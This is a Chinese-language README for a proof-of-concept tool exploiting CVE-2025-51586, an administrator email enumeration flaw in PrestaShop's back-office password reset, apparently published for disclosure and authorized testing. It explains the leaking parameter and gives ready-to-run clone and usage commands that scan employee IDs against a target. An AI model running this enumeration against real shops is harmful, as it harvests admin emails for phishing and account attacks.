
本仓库包含针对漏洞 CVE-2025-51586 的符合道德规范的 PoC(概念验证),影响 PrestaShop 版本 1.7.x — 8.2.2。
该 PoC 通过后台密码重置机制(AdminLogin 控制器)枚举管理员电子邮件地址。
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee 和无效的 reset_token<input name="reset_email" value="[email protected]">官方公告:Friends of Presta Security
由 Friends of Presta Security Team 报告(公告发布于 2025 年 9 月 4 日)。
本 PoC 仅用于教育和授权测试。 仅在您拥有或已获明确许可的系统上使用。作者和贡献者不对滥用行为负责。
克隆并安装依赖项:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC 由 7h30th3r0n3 开发。漏洞由 Friends of Presta Security Team 发现。